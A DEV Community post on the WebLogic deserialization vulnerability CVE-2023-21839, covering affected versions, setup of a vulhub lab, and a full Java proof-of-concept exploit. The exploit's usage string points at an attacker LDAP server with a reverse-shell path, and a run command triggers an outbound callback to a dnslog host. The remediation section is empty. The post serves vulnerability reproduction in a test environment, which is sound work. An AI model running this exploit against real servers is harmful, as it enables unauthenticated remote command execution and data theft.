DEV Community

Cover image for WebLogic Deserialization Vulnerability - CVE-2023-21839
TutorialBoy
TutorialBoy

Posted on

1

WebLogic Deserialization Vulnerability - CVE-2023-21839

Introduction

WebLogic is an application server produced by Oracle Corporation in the United States. To be precise, it is a middleware based on JAVAEE architecture. WebLogic is a Java application server for developing, integrating, deploying, and managing large-scale distributed Web applications, network applications and database applications.

Vulnerability Overview

CVE-2023-21839

Due to flaws in the Weblogic IIOP/T3 protocol, when the IIOP/T3 protocol is enabled, unauthenticated attackers are allowed to attack WebLogic Server with security risks through the IIOP/T3 protocol network access. A successful WebLogic Server may be taken over by an attacker to execute arbitrary commands, resulting in a server crash or severe sensitive data leakage.

Affect Versions

  • Weblogic 12.2.1.3.0
  • Weblogic 12.2.1.4.0
  • Weblogic 14.1.1.0.0

Environment

You can use vulhub to build a vulnerability environment:

https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839

clone project:

git clone https://github.com/vulhub/vulhub.git
Enter fullscreen mode Exit fullscreen mode

In the /WebLogic/CVE-2023-21839/ directory, use the following command to download and start the 12.2.1.3 version of WebLogic:

docker-compose up -d
Enter fullscreen mode Exit fullscreen mode

Then visit http://your-ip:7001/console, you can see the login page

Image description

Vulnerability Reappearance

You can use the DXask88MA master's tool:

weblogic.deployment.jms.ForeignOpaqueReference.class

Enter fullscreen mode Exit fullscreen mode

You can also choose to use the 4ra1n master tool to simulate data packets with go:

weblogic.jndi.internal.ForeignOpaqueReference.class
POC:

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Random;

public class CVE_2023_21839 {
    static String JNDI_FACTORY="weblogic.jndi.WLInitialContextFactory";
    static String HOW_TO_USE="[*]java -jar Target ip:port ldap address\n e.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111";

    private static InitialContext getInitialContext(String url)throws NamingException
    {
        Hashtable<String,String> env = new Hashtable<String,String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
        env.put(Context.PROVIDER_URL, url);
        return new InitialContext(env);
    }
    public static void main(String args[]) throws Exception {
        if(args.length <2){
            System.out.println(HOW_TO_USE);
            System.exit(0);
        }
        String t3Url = args[0];
        String ldapUrl = args[1];
        InitialContext c=getInitialContext("t3://"+t3Url);
        Hashtable<String,String> env = new Hashtable<String,String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");
        weblogic.deployment.jms.ForeignOpaqueReference f=new weblogic.deployment.jms.ForeignOpaqueReference();
        Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
        jndiEnvironment.setAccessible(true);
        jndiEnvironment.set(f,env);
        Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
        remoteJNDIName.setAccessible(true);
        remoteJNDIName.set(f,ldapUrl);
        String bindName = new Random(System.currentTimeMillis()).nextLong()+"";
        try{
            c.bind(bindName,f);
            c.lookup(bindName);
        }catch(Exception e){ }

    }
}
Enter fullscreen mode Exit fullscreen mode

Use dnslog directly to test and download the Jar file:

Executing an order:

java -jar Weblogic-CVE-2023-21839.jar 127.0.0.1:7001 ldap://81c95c8f.dns.1433.eu.org/test

Enter fullscreen mode Exit fullscreen mode

Check the dnslog, the request is received, and the vulnerability verification is successful

Image description

Remediation

Reference link:

AWS Security LIVE!

Join us for AWS Security LIVE!

Discover the future of cloud security. Tune in live for trends, tips, and solutions from AWS and AWS Partners.

Learn More

Top comments (0)

AWS Security LIVE!

Tune in for AWS Security LIVE!

Join AWS Security LIVE! for expert insights and actionable tips to protect your organization and keep security teams prepared.

Learn More

👋 Kindness is contagious

Discover a treasure trove of wisdom within this insightful piece, highly respected in the nurturing DEV Community enviroment. Developers, whether novice or expert, are encouraged to participate and add to our shared knowledge basin.

A simple "thank you" can illuminate someone's day. Express your appreciation in the comments section!

On DEV, sharing ideas smoothens our journey and strengthens our community ties. Learn something useful? Offering a quick thanks to the author is deeply appreciated.

Okay